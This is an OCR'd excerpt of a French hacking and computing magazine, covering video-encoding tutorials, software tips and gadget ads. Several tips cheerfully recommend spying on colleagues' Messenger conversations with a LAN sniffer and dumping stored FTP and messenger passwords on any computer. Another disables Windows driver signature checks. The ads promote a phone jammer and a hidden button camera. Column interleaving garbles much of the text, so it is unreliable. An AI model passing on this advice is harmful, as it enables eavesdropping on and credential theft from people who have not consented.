fier lapparence, vous pourrez renommer les pour Photos etc.
sections et dfinir un fond dcran propre
chacune delles. CE QU'IL VOUS FAUT
3 Paramtrages > Sesam TV Media Center
(gratuit)
Cliquez dans une section pour commencer www.sesamtv.com
paramtrer vos mdias, Tlvision, par exem-
ple. Slectionnez votre type de tuner puis
laissez vous guider pour que Sesam TV intgre DIFFICULT

39
Mme si les logiciels
disponibles actuellement

ENCODEZ
pour encoder ou rencoder
sont assez accessibles,
PocketDivXEncoder (PDE)
place la barre un peu
plus haut en matire de
convivialit. Mme sil
est simple prendre en
LE PLUS
main, ce logiciel est aussi
suffisamment arm pour
toutes sortes de situations : SIMPLEMENT
incrustation de sous-titres,
dcoupe, correction des
dcalages audio/vido ou DU MONDE
encodage par lot. Cest notre
chouchou du moment.

Corriger un dcalage
audio/vido
Cette option permet de ralentir
ou acclrer la vitesse du flux
vido pour que les flux audio
et vido aient la mme dure.
Cette option permet aussi de
recrer la table dinterleaving
de la vido (linterleaving, cest
la manire dont le flux vido et
le flux audio sont entrelacs).
Pour resynchroniser un fichier
dont les flux audio et vido ne
sont pas en phase, cliquez sur
le bouton (E).
M4ng
Si Pocket DivX Encoder ne vous don-
ne pas entire satisfaction, il existe
un alternative pour ce qui est de len-
codage ou du r-encodage. Essayez
le trs bon M4ng, successeur de
Ri4m. Il est trs facile apprhender
tout en restant performant.
www.m4ng.fr
P
ocketDivXEncoder est, PDA, Palm, PC, Archos, iRiver, Home
comme son nom lindique, Cinema, TV HD, etc. Pour chacune
un logiciel dencodage vido des configurations, PDE dispose de
destin aux utilisateurs prrglages dfinis pour rpondre au
dappareils mobiles. Mme sil excelle mieux aux donnes des constructeurs :
dans ce domaine, il est aussi tout fait fini les bandes noires, les vidos
capable de travailler pour diffrents crases cause dune rsolution ne
types de support : Smartphone, correspondant pas ou du son absent
PRATIQUE Dcoupage facile
1 Visualisation
Aprs avoir slectionn la vido que
vous voulez encoder et rgl vos para-
mtres, cliquez sur Dcoupage vido.
Une nouvelle fentre devrait souvrir
avec le fichier que vous voulez cou-
per, incrust dans lappareil de votre
choix. Ici, vous pouvez, lire, avancer ou
faire pause.

40
 ANONYMAT HACKING PROTECTION MULTIMDIA MICRO FICHES
ENCODAGE VIDO

parce quil ne colle pas la norme

tablie par votre appareil. Sans
ncessiter dinstallation, PDE se paye
LINTERFACE GNRALE
Chemin du fichier Slectionnez Slectionnez Obtenez des Liste de fichiers
mme le luxe de ne pas demander slectionn votre fichier votre fichier informations sur le encoder la
de codecs additionnels. Il est, en A sous- titre B fichier vido suite
effet, possible de travailler partir Chemin du fichier
de nimporte quel type de fichier : de sortie

AVI (en DivX ou Xvid), MKV, MPEG, Rglages concernant

etc. Le format de sortie dpendra la qualit, le rendu et
bien sr du type dappareil que le son
vous avez slectionn au dbut du Bouton permettant de
processus. changer la rsolution par
dfaut
C
Les petits plus Dcoupe vido : pour
Mention spciale pour la facilit supprimer des pubs, des
gnriques, etc.
avec laquelle le logiciel permet
de corriger les dcalages qui Avant dencoder, il est bon
surviennent parfois entre le son et davoir un aperu rapide
la vido. Pour ceux qui souhaitent du rsultat D
garder uniquement une partie de
Une fois tout rgl, cest
la vido, il est aussi possible de ici quil faut cliquer !
faire des coupes. Pour les petites
Lire le Options avances : Attention, dans le
vido (comme les pisodes de Corriger un dcalage fichier de dsentrelacement, cas dun encodage
srie, par exemple), PDE autorise entre le son et la sortie encodage en 2 passes, par lot, cest ici quil
vido E fichiers de prconfiguration, faut cliquer pour
le traitement par lot. Il suffit de etc. (voir la prochaine traiter les fichiers
dfinir un rglage, de slectionner illustration pour les dtails) la suite...
les vidos puis de laisser le logiciel
faire son travail. Enfin, la fonction en faire un seul fichier. Alors quil
qui a fait craquer votre serviteur fallait passer par VirtualDub et le CE QU'IL VOUS FAUT
cest lincrustation des sous-titres. rigoureux paramtrage de filtres,
Nombreux sont les appareils de PDE sacquitte de cette tche haut
> PocketDivXEncoder
poche ou les platines de salon qui la main avec en plus quelques
(gratuit)
ne lisent pas les formats SUB, SRT options sympas comme le choix www.pocketdivxencoder.net
ou TXT. PDE va simplement les de la police et de la taille des
scinder avec la vido idoine pour caractres. Un vrai bonheur DIFFICULT

en 3 tapes 3 Termin
Il ne restera plus
qu choisir Enco-
2 Les marques dage direct sur la
Il suffit davancer la fentre principale
barre de dfilement pour que le logiciel
lendroit voulu puis se dbarrasse des
de cliquer sur Mar- parties superflues.
quer le dbut. En- Bien sr, il est pos-
suite, placez la barre sible de cumuler
de dfilement o ce dcoupage avec
vous souhaitez que la dautres options du
vido se termine puis logiciel (ajout de
cliquez sur Marquer sous-titres, change-
la fin. ment de rsolution, etc.)

41

PRATIQUE Encoder un fichier
en 5 tapes
1 Lappareil cible
Lors du dmarrage, le logiciel vous
propose, tout de suite, une liste dappareil
pour lesquels il a les spcifications en
mmoire : Smartphone, PDA, Palm Tungsten,
PC, Archos, iRiver, Home Cinema, TV HD. Si
votre appareil ne figure pas dans la liste,
choisissez celui qui sen rapproche le
plus, il sera facile par la suite de changer
lgrement les paramtres.
2 Le fichier encoder
Cliquez ensuite sur licne A ct du
champ Fichier encoder pour trouver
votre vido. Par dfaut, la vido de sortie ira
directement dans le mme rpertoire mais il
est possible de changer la destination juste
en dessous. Si vous voulez incruster un
Lencodage en deux passes est un
procd plus long qui permet
davoir un meilleur rsultat
LES OPTIONS
AVANCES
Permet dutiliser le Xvid plutt que
le DivX
Pour supprimer le son, viter de
le rencoder ou de la normaliser
(mme volume pour tous les
fichiers)
Permet de sauver les
paramtres existants ou de
charger ceux dj sauvegards
sous-titre, il faudra cliquer sur licne B .
Dans le cas contraire, passez ltape 4.
3 Les sous-titres
Aprs avoir cliqu sur licne B ,
slectionner votre fichier de sous-titres.
Une petite fentre vous demandera alors
de choisir la police (nous vous conseillons
de garder latin1) ainsi que la taille du texte.
C pour pivoter la vido (si vous tenez votre
appareil debout ou couch)
5 Prvisualisation
Une fois que vous avez fini vos rglages, nous
Il ne vous reste qu cliquer sur Appliquer vous conseillons de cliquer sur Prvisualisa-
pour passer ltape suivante tion D . Un court extrait de votre vido saf-
fichera alors dans une fentre. Vous pourrez
alors juger de la bonne taille des sous-titres
4 Les choix dencodage ou de la qualit du rendu. Si laperu vous
En fonction de la taille disponible sur votre satisfait, cliquez dans Encodage direct (ou
appareil, vous pourrez aprs rgler la qualit Ajouter la liste si vous voulez faire un traite-
de la vido, du son ainsi que la rsolution ment pas lot). Il ne reste plus qu attendre
(une approximation de la taille du fichier
finale saffichera en bleu). Cependant,
nous vous dconseillons de toucher cette
dernire puisquelle aura t spcialement
choisie pour rpondre au mieux aux
exigences de lappareil. Sachez cependant
que vous pouvez faire un tour dans Changer
42
 KIOSQUE
NUMRIQUE
CONSULTEZ LE MEILLEUR DE LA
PRESSE INFORMATIQUE SUR PC

TLCHARGEZ
Click&Load

Click&Load P2P

WebPocket

Btorrent
1 C'EST CONOMIQUE :
grce aux forfaits First
Top 500 Sites
et co-forfaits WWF illimits !

Pirate Informatique
2 C'EST PRATIQUE :
consultez et archivez en
Et tous leurs
quelques clics !
hors-sries !

www.idkiosque.com
Le kiosque Offre
www.relay.com
numrique d'essai
Tlchargez + de 300 Tlchargez
magazines en accs GRATUITEMENT
direct sur votre PC un magazine en vente
actuellement
 1 LOCALISEZ
UNE IP
AVEC VISUAL IP
LOCATOR
Visual IP Locator est un petit logiciel
trs simple qui vous permettra de
localiser gographiquement une adresse
IP et ventuellement de connatre son
propritaire. Il suffit de saisir ladresse IP
laquelle vous avez eu affaire pour avoir
son emplacement. Si lIP appartient
une socit, son nom et la tranche dIP
safficheront, si cest un particulier connect
par lintermdiaire dun FAI, cest le nom du
FAI qui sera identifi.
Enfin, grce loutil WarningIP, vous pourrez
facilement savoir si lIP appartient une
liste dadresses interdites.
3 PURIFIEZ WINDOWS
LIVE MESSENGER
AVEC CLEAN VIRUS MSN
MSN, Windows Live Messenger
de son vritable nom, est
un logiciel bourr de faille
de scurit et de faiblesses
diverses. On ne compte plus
le nombre de comptes vols,
dusurpation didentit ou
de contaminations virales en
rapport avec ce programme.
Malheureusement, cest la
messagerie instantane la
plus utilise. Pour supprimer
les virus qui seraient venus
se greffer sur votre MSN, voici
Clean Virus MSN. Ce dernier
radique spcifiquement
les malwares transmis par
ce dernier. Clean Virus MSN
dtecte et supprime jusqu
4 000 variantes de ces sales
btes. Il suffit de cliquer sur
Analyser puis de supprimer ce
quil aura dtect.

4
http://egyde.free.fr/progz/vil.html www.viruskeeper.com/fr/
clean_virus_msn.htm
DES MOTS
DE PASSE EN

2
CLAIR
SCURISEZ VOS PORTS AVEC BEHINDTHEASTERISKS
AVEC ASHAMPOO FIREWALL Difficile de faire plus simple. BehindTheAsterisks
permet dafficher les mots de passe masqus par
les fameux astrisques sous Windows. Si vous
Dans le prcdent numro, ne souvenez plus dun mot de passe, il suffit de
nous vous avions parl du passer votre souris sur ces petites toiles pour
trs bon firewall ZoneAlarm voir le mot de passe en clair ! Plus besoin de
qui convient parfaitement redemander un mot de passe ou de passer en
aux ordinateurs ne (brute) force
possdant pas le pare- http://syrka.free.fr/freewares/behind.htm
feu inclus aux dernires
versions de Windows.
Voici un autre logiciel
de ce type : Ashampoo
Firewall. Ce dernier brille
par sa simplicit et par son
interface claire. Les dbutants apprcieront le mode facile tandis que
les tatillons pourront se faire la main sur le mode Expert : paramtrages
pousss des exceptions, configuration individuelle des ports, etc. Pour
profiter de cette version gratuite, il suffit de senregistrer sur le site
Attention, il est dconseill dutiliser deux pare-feu en mme temps.
Dsactivez celui de Windows si vous voulez utiliser Ashampoo.
www.ashampoo.com

44
 ANONYMAT
5 RPARER UNE ARCHIVE
AVEC ZIPREPAR
Rien de plus pnible que de se retrouver
avec une archive ZIP corrompue. Quil
sagit dun tlchargement inachev minutieuse). Au final, vous rcuprez
(genre 99,8 %) ou dune erreur de
manipulation, il est possible de faire
quelque chose avec ZipRepar. Mme
sil ne rpare que les ZIP (pour les
RAR, essayez www.recoverytoolbox.
com), il le fait trs bien et ne ncessite
pas dinstallation. Il suffit de spcifier
6 SUPPRIMEZ LES ROOTKITS
AVEC ROOTKITREVEALER
Les rootkits sont des programmes sournois
et fourbes destins faciliter laccs dun
pirate ou dune organisation votre PC (on se
souvient de laffaire Sony o la marque avait
mis un rootkit dans ces CD audio pour mieux
fliquer ses clients). De vraies salets liminer.
Particulirement discret, un rootkit attend
le meilleur moment pour vous poignarder
dans le dos. Pour lutter, nous vous proposons
RootkitRevealer, un outil de dtection qui
ne fait pas dans le superflu : scan manuel,
automatique, de la base de registre et un
7
RETROUVEZ VOS MOTS
DE PASSE
AVEC WINDOWS
FTP Pass Finder permet en un
seul clic de retrouver vos mots
de passe FTP perdus. Il suffit
de la lancer et de cliquer sur le
bouton Scan pour que ce dernier
aille chercher les mots de passe
contenu dans les clients FTP les
plus courants : FileZilla, AceFTP,
BulletProof FTP, CuteFTP, FlashFXP,
FTP Voyager, Total Commander,
TurboFTP, etc. En face de chaque
client, vous retrouverez le nom du compte
et son mot de passe en clair. Bien sr, cela
fonctionne sur nimporte quel ordinateur
HACKING PROTECTION
lemplacement de votre fichier et
de choisir la mthode (rapide ou
un ZIP tout neuf qui pourra tre
dcompact sans encombre. Attention,
ZipRepar ne fait pas de miracle, inutile
desprer rcuprer les fichiers contenus
dans un ZIP termin 45 %.
www.easycommander.com/
telecharger/ziprepa
mode ligne de commande. Une fois dtect,
le rootkit est dsactiv et le logiciel se ferme
automatiquement.
http://technet.microsoft.com/fr-fr/
sysinternals
http://egyde.free.fr/progz/
passfinder.html
45
MULTIMDIA MICRO FICHES
8 SIGNEZ UN
FICHIER
AVEC
MD5SUMMER
Lalgorithme MD5 (pour Message
Digest 5) est une fonction de
hachage cryptographique permettant
dobtenir une empreinte numrique
dun fichier. En clair, il sagit de
gnrer une chane de caractres de
16 fois 16 octets qui qualifie trs
prcisment le contenu du fichier.
Impossible ensuite pour un tiers
de le modifier de quelque manire
que ce soit (par stganographie ou
dautres procds). Vous pourrez
aussi contrler quaucun virus ne la
contamin ou quun transfert a t
correctement fait. MD5Summer permet
donc de crer des sommes MD5 sur
un ou plusieurs fichiers (il est possible
de slectionner une arborescence
complte dun disque dur).
www.md5summer.org
 9
CACHEZ UN
FICHIER
AVEC CAMOUFLAGE
10 EFFACER VOS TRACES
AVEC BLEACHBIT

Camouflage permet de Des traces, vous nen

cacher un fichier dans un autre pour
le faire passer inaperu. Lavantage
de Camouflage par rapport aux autres
logiciels de stganographie cest quil
est compatible avec plusieurs types de
fichiers : EXE, JPG, DOC, TXT, etc. Plus fort,
les fichiers qui servent de coquilles
sont parfaitement oprationnels pour
mieux tromper lennemi ! Comme avec
la plupart des logiciels de ce type, il est
aussi possible dajouter un mot de passe.
Votre correspondant, pour retrouver le
fichier cach doit possder camouflage et
avoir le mot de passe ventuel...
http://camouflage.unfiction.com
laissez pas seulement
dans votre navigateur
mais vous en laissez
aussi dans la plupart
des logiciels et systme
dexploitation. Afin de
protger au mieux votre vie
prive (et pas seulement
effacer le cache de Firefox
!), voici BleachBit ! Ce
dernier vous permettra
de supprimer vos traces
numriques sur Google
Earth, Adobe Reader,
Filezilla, Flash, OpenOffice. est aussi en mesure de rcrire par-dessus
org, Pidgin, RealPlayer, Skype, Microsoft les donnes effaces pour quune personne
Office, Gimp, Windows Media Player, Azureus, ne puisse pas les rcuprer ! Avant dutiliser
Winrar, Winamp, etc. De surcrot, il soccupera BleachBit, nous vous conseillons de noter
de vider la corbeille et le presse-papiers, quelque part vos identifiants et mot de
liminer la liste des fichiers consults passe...
rcemment et supprimer tous les fichiers http://bleachbit.sourceforge.net/news/
temporaires. Pour plus de scurit, BleachBit bleachbit-065-released

11 AMUSEZ-VOUS AVEC MSN

AVEC MSN CHECKER SNIFFER
Si vous avez accs un rseau local (au travail, ,lUniversit, etc.), MSN
Checker Sniffer permet de surveiller les conversations sur Windows Live
Messenger. Ce programme va automatiquement chercher les communications
en scannant les ports attribus MSN. Slectionnez les IP qui vous intressent (ou choisissez-en
une au hasard) et vous pourrez suivre les conversations en direct. Il est aussi possible de les
exporter dans un fichier pour y jeter un il plus tard et mme de couper la conversation. Attention
la version dmo de ce logiciel ne permet quune visualisation limite des messages...
www.msn-tools.net

12 TRANSFERT SCURIS
AVEC WINSCP
WinSCP est un logiciel qui utilise le protocole SSH pour changer
des informations scurises entre deux machines. Il se prsente
visuellement comme un client FTP : lecture du contenu des
rpertoires, dition, suppression de fichiers, etc. En utilisant le SSH vous tes absolument
sr que personne ne sera en mesure de savoir ce qui transite par votre connexion. Grce
WinSCP, il est possible de se connecter un serveur SSH en utilisant le protocole SFTP
(SSH File Transfer Protocol) ou le service SCP (Secure Copy Protocol). Notez que WinSCP
supporte aussi bien le SSH-1 et le SSH-2.
http://winscp.net/eng/docs/lang:fr

46
 ANONYMAT
12 RETROUVEZ VOTRE
MOT DE PASSE MSN
AVEC MESSENPASS
Cela vous est dj sans doute arriv : vous
laissez votre logiciel de messagerie mmoriser
votre mot de passe et le beau jour o il
vous le redemande, vous lavez oubli ! Il
peut sagir dune nouvelle version ou dune
erreur de votre part mais le mal est fait. Si
en plus vous ne possdez plus le-mail qui
a servi linscription, vous tes bon pour
vous refaire un compte ! Heureusement, voil
13 ANALYSEZ VOS
PROCESSUS
AVEC THREATFIRE
Threatfire est une
sorte de sentinelle
mi-chemin entre
lantivirus et le firewall.
Il analyse les processus
dont lactivit est nocive
pour votre systme
grce une mthode
heuristique (qui utilise
une dtection base sur
la recherche dactivits
potentiellement
dangereuses et pas
une base de signature
comparative). Si vous
tes victime dune menace rcente,
le logiciel ne sera donc pas dmuni.
Threatfire dispose bien sr dun module en
tche de fond qui est en mesure de grer
les problmes en temps rel. Notez aussi
HACKING PROTECTION
MessenPass qui permet de retrouver les mots
de passe de Windows Live Messenger, Yahoo
Messenger, Google Talk, ICQ, AOL Instant
Messenger,Trillian, Miranda, GAIM ou Pidgin. Il
suffit de lancer le programme et il soccupera
automatiquement de dcouvrir et dafficher
lensemble des mots de passe archivs dans
vos applications...
www.nirsoft.net/utils/mspass.html
quil peut parfaitement cohabiter avec tout
autre programme de scurit (antivirus,
pare-feu et antispyware) sans entrer en
conflit.
www.threatfire.com
47
MULTIMDIA MICRO FICHES
15
VITEZ LES
CURIEUX
AVEC ANTISPYE
AntiSpye nest pas un nime
anti-spyware, il a tout simplement
t cr pour viter les regards en
coin sur votre cran ! Dun
simple mouvement,
il est possible de
cacher ce que
vous faites sur
votre ordinateur en plaant une
page noire, un conomiseur dcran
ou un faux bureau. Il suffit pour
cela de taper sur la touche Impr.
cran et dutiliser la dissimulation
Show cover image. Ensuite,
reprenez le contrle de votre bureau,
par le raccourci clavier Alt Gr + .
Il est aussi possible de masquer
une fentre en cliquant simplement
sur un des points pour la faire
disparatre quelques instants...
www.zerge.com
16 INTERDIRE LACCS AU
GESTIONNAIRE DES TCHES
AVEC WINDOWS VISTA 18
MOINS DE
Pour viter que les
utilisateurs de votre LOGICIELS AU
ordinateur nutilisent
le Gestionnaire des
DMARRAGE
tches de Windows AVEC WINDOWS
(pour fermer un
processus ou Si vous en avez marre que 10 000
bidouiller un service logiciels se lancent automatique au d-
par exemple) il marrage de Windows, voici la solution.
est possible de le Cliquez sur le bouton Dmarrer, saisissez
dsactiver en passant la commande msconfig et validez par
par le Registre. Pour Entre pour lancer lutilitaire de configura-
cela, cliquez sur le tion du systme intgr Windows. Ouvrez
bouton Dmarrer longlet Dmarrage pour avoir accs la
puis dans le champ liste de tous les programmes excuts. D-
Rechercher, saisissez cochez juste les cases devant les logiciels
la commande que vous voulez dsactiver et validez..
regedit et pressez
la touche Entre.
Dans cette nouvelle fentre, droulez la cl DWORD 32 bits. Nommez la nouvelle valeur
HKEY_CURRENT_USER, Software, Microsoft, DisableTaskMgr et double cliquez dessus.
Windows, CurrentVersion, Policies. Cliquez Saisissez 1 dans la zone Donnes de la
sur le menu Edition, sur Nouveau puis sur valeur. Validez par OK puis fermez lditeur du
Cl. Saisissez System puis appuyez sur registre. A partir de maintenant, les liens vers
Entre. Droulez ensuite le menu Edition, le Gestionnaire des tches seront griss et
cliquez sur Nouveau puis sur Valeur personne dy aura accs.

17 LOCALISER ET SUPPRIMER LES FICHIERS

VOLUMINEUX
AVEC WINDOWS 7 OU VISTA
Si plusieurs personnes utilisent
votre ordinateur, il nest pas
facile de savoir qui met quel
fichier quel endroit. Il suffit
que votre petite sur remplisse
le disque dur de vidos non
compresses dune obscure srie
porto-ricaine pour fulminer le jour
o vous avez besoin despace
disque et quelle ne sait plus
o elle a rang ses fichiers...
Pour y remdier, Windows Vista
permet de localiser les fichier
volumineux pour les supprimer
en cas de besoin. Cliquez sur le
bouton Dmarrer, Ordinateur
et pressez la touche F3. Loutil
de recherche devrait safficher.
Cliquez sur la flche droite de
llment Recherche avance
puis droulez la liste Taille (Ko)
et slectionnez loption Est
suprieur ... Saisissez dans le
champ ct, la taille minimale
(en Ko) que les fichiers doivent
avoir, 300000 pour les fichiers
avec une taille suprieure
300 Mo, etc. Cliquez enfin sur le
bouton Rechercher. Dans cette
zone, cliquez sur le bouton Outils
de recherche puis sur Options
de recherche. Vous pouvez aussi
cochez la case Inclure les fichiers
compresss (ZIP, CAB, RAR, etc.)
Pour supprimer un fichier, cliquez
dessus et pressez la touche
Suppr. Noubliez pas de vider la
corbeille !

48
 ANONYMAT HACKING PROTECTION MULTIMDIA MICRO FICHES

19 DBRANCHER SA CL USB EN SCURIT

AVEC WINDOWS 7 OU VISTA

Avant de dbrancher votre cl USB, vous contextuel. Dans

devez tre certains que lcriture de toutes
les donnes que vous avez copies dessus
est bien termine. Il existe bien sr un
menu spcial pour dconnecter votre cl de
manire sre mais il est un peu laborieux
dy faire appel. Sachez quil est possible
dajouter un raccourci sur votre Bureau qui
vous permettra de terminer proprement
tous les transferts avec la cl ! Pour cela,
cliquez avec le bouton droit de la souris sur
un espace vide du Bureau et choisissez la
commande Nouveau-Raccourci du menu
la zone Entrer
lemplacement
de llment,
saisissez la commande nouvellement cr et choisissez
suivante : Rundll32 Proprits. Slectionnez le bouton
shell32.dll,Control_ Changer dicne puis Parcourir. Choisissez
RunDLL HotPlug.dll. le fichier Shell32.dll et cliquez sur
Cliquez sur le bouton Suivant, donnez Ouvrir pour choisir une nouvelle icne.
un nom au raccourci (Dbrancher cl Dornavant, il suffira de double-cliquer
USB par exemple) puis cliquez sur le sur le raccourci Dbrancher cl USB que
bouton Terminer. Cliquez encore avec le vous venez de crer pour retirer votre
bouton droit de la souris sur le raccourci priphrique en toute scurit !

20 LIRE LES SOUS-

TITRES DUNE VIDO
AVEC VLC OU WINDOWS
MEDIA PLAYER
21 DSACTIVER
LAUTHENTI-
FICATION DES
PILOTES
Si pour vous le doublage dun film tue toute la magie, vous seriez peut-tre AVEC WINDOWS VISTA ET 7
intress par regarder vos film ou srie en VO. Pour profiter de ces fameux
fichiers sous-titres SUB, SRT, TXT ou SSA, il faudra passer par le logiciel VLC Linstallation de certains pilotes de priphriques peut
Media Player ou par Windows Madia Player. Pour que ces logiciels prennent tre bloque par Windows 7 ou Vista si ces derniers
en compte les sous-titres, il faudra renommer les fichiers SUB et AVI de la ne sont pas authentifis par Microsoft. Pour contourner
mme manire (et cette restriction, cliquez sur le bouton Dmarrer puis
les mettre dans dans le champ Rechercher, saisissez la commande
le mme dossier, bcdedit /set nointegritychecks ON. Pressez la touche
accessoirement). Entre. A lavenir Windows ne vrifiera plus la signature
Pour vous faciliter des pilotes que vous installez. Une fois votre pilote exo-
la tche vous tique install, vous pouvez ractiver la vrification avec
pouvez ouvrir la commande bcdedit /set nointegritychecks OFF.
nimporte quel
fentre de
Windows, cliquer
sur le menu
Options puis
sur Options des
dossiers. Dans
longlet Affichage,
dcochez la ligne
Masquer les
extensions des
fichiers dont le type est connu. Si votre film (film.avi) et votre sous-titre
(film.sub ou film.srt) sont nomm de la mme manire, double cliquez sur
lAVI pour que le SUB se lance automatiquement. Si vous rencontrez un
problme, ouvrez VLC et cliquez sur Media>Ouvrir un fichier (avanc) pour
cochez la case Utiliser un fichier de sous-titres.

49
 > Au doigt et loeil !
Fini la panique de loubli du mot de passe, termin le casse-tte des
ordinateurs multi-utilisateurs grce lEikon de Blizzpartners. Sur votre
ordinateur, accdez votre session, votre espace de travail, vos donnes,
dun glissement de doigt sur ce lecteur dempreintes digitales. Plus personne
dautre que vous ne pourra ouvrir votre ordinateur ou effacer des donnes sur
une session laisse ouverte. Lappareil permet de mmoriser 15 empreintes
digitales cryptes la norme AES-256. Pas moyen de tricher puisque lEikon
dtecte les 12 points caractristiques de votre empreinte digitale Plus besoin
de retenir une flope de mots de passe pour ouvrir une session ou accder un
programme. En effet, il est possible de lancer une application laide dun doigt
particulier : Word avec lindex et Windows Media Player avec le majeur par exemple.
Prix : 50 www.blizzpartners.com

> Le troisime il > a va couper chrie !

Pour protger votre maison, votre appartement ou votre bureau, Cet appareil est un brouilleur donde
voici larme ultime : la Heden VisionCam CAMHED02IPW. Cette permettant de rendre inoprant les tlphones
dernire est compatible Ethernet ou Wi-Fi. Vous pourrez voir ce qui portables dans un rayon de 12 mtres.
se passe depuis nimporte quel ordinateur connect Internet et Avec ce dernier rien ne passe, quil sagisse
comme lappareil est motoris (angle de 240 horizontalement donde GSM, 3G, EDGE, etc. Il empche
et 90 verticalement), vous pouvez diriger le champ de vision tout simplement les tlphones mobiles
distance ! Plus fort encore, cette camra IP voit galement dans le se connecter lantenne relais, il brouille
noir (jusqu 5 mtres) grce son systme infrarouge et elle est toutes les frquences utilises en Europe
quipe dun microphone et dun haut-parleur. Pratique pour parler et dans la plupart des pays du monde. Si
sans avoir tlphoner ou faire fuir des gredins qui se seraient une communication est en cours, elle sera
invits chez vous. Bien sr, si tout votre matriel se fait drober, il est possible de stocker des images immdiatement interrompue. Le brouilleur
ou des vidos sur un serveur distant ce qui permettra davoir des preuves de votre sinistre. Tout est fonctionne avec une batterie rechargeable sur
fourni dans la bote pour une installation au plafond. secteur dune autonomie de 2 3 heures.
Prix : 90 www.coindugeek.com Prix : 20 www.chinavasion.com

> Souriez, vous tes espionn

Voici une camra cache assez originale. Aprs le dispositif cach dans les lunettes, les casquettes, les
paquets de cigarettes ou les cannettes de Coca, voici le bouton de veste ! Il suffit de choisir le bouton
le plus ressemblant celui de votre veste et de le monter sur lappareil. Le botier se dissimule derrire
votre veste ou votre chemise. Il suffit ensuite dappuyer sur un bouton
pour commencer lenregistrement (en faisant semblant de remettre sa
cravate, par exemple). Lappareil dispose de 4 Go de mmoire (format
3GP en 604x448) pour stocker laudio et la vido. Comme la plupart des
appareils de ce type, la connexion au PC ainsi que la charge se font via
un cble USB (fourni). Lautonomie est de 2 heures environ. Notez que
lappareil est trs compact (60 x 17 x 19 mm) et quil est possible de le
dissimuler dans dautres endroits
Prix : 35 www.chinavasion.com

50
Le module de reconnaissance digitale
Blizzpartners Eikon
Le module Eikon, une fois branch sur un port USB permet douvrir une session ou de jongler avec plusieurs utilisateurs. Il est aussi
possible dassocier un de vos doigts une application ou de crypter nimporte quel dossier de votre ordinateur en AES 256 bits.
Mme si linterface est claire et en franais, nous allons expliquer point par point comment utiliser votre nouveau gadget.

1 Lors de linstallation, ne branchez lappareil que lorsque le logiciel vous le demandera.

Aprs avoir redmarr, le PC vous proposera de tlcharger une extension pour Firefox
(si vous utilisez ce navigateur). Aprs avoir branch le Eikon, faites un double clic dans la
nouvelle icne qui apparat dans le systray (en bas droite ct de lhorloge). Cliquez
FIG 1 ensuite sur Initialiser pour commencer paramtrer votre nouvelle acquisition. Notez
quaprs avoir initialis votre appareil, il est conseill de lenregistrer en ligne pour avoir accs
toutes les fonctionnalits.

2 Le logiciel vous demandera alors de choisir entre un stockage sur le dispositif ou un stockage
sur le disque dur. Cela ne change pas grand-chose puisque de toute faon, vos empreintes
digitales seront chiffres. Il sera impossible pour un contrevenant de les voler ou de les copier.
Lorsque le logiciel vous demande le type de mcanisme de protection pour le mot de passe
Windows choisissez Empreinte digitale + cl pour justement crypter votre empreinte (Fig1). Pour
une scurit maximum, choisissez un mot de passe dau moins 12 caractres.

FIG 2 FIG 3 FIG 4

3 Le logiciel va alors vous demander de passer 3 fois le doigt de votre choix sur le dispositif pour
enregistrer votre empreinte avec le plus de prcision possible (Fig 2). Si vous vous y prenez mal, le
FIG 5 logiciel vous le dira aussi en vous conseillant sur la meilleure manire de faire (une petite animation est
mme prsente pour vous aider). Le logiciel dinstallation va ensuite vous demander de faire la mme
manipulation avec chacun de vos doigts pour pouvoir lancer des applications directement (Fig 3). Vous
pourrez paramtrer les applications associes grce au Biomenu. Il suffit de passer son doigt sur le
Eikon depuis le bureau pour y avoir accs (Fig 4).

4 Voyons maintenant comme crypter un fichier ou un dossier du bout du doigt ! Faites un clic
droit dans un groupe de fichiers, par exemple et slectionnez Ajouter la nouvelle archive
crypte (Fig5). Slectionnez lemplacement et validez (ce nest pas la peine de convenir dun mot
de passe si vous avez choisi Empreinte digitale + cl comme mcanisme de protection). Votre
groupe de fichier est maintenant inaccessible et vous devrez passer votre doigt sur lappareil pour
pouvoir louvrir.

51
CD OFFERT
LE GUIDE
LE PACKAGE PRATIQUE
DU PIRATE 100% MICRO-FICHES,
Tous les logiciels
INDISPENSABLES
TRUCS & ASTUCES

U H ACKER
D
HIERS
LES CA

I R AT
P tique E
in f r m a
PIRATAGE DE COMPTES
MOBILE INTRUSION

H ACKING
C
RYPTAGE ROOTKIT
ANONYMAT
SURVEILLANCE
MOTS DE PASSE
BEL : 6 - DOM : 6,10 - CAN : 6,95 $ cad - POL/S : 750 CFP WI-FI MEGAUPLOAD
CONTRLE DISTANCE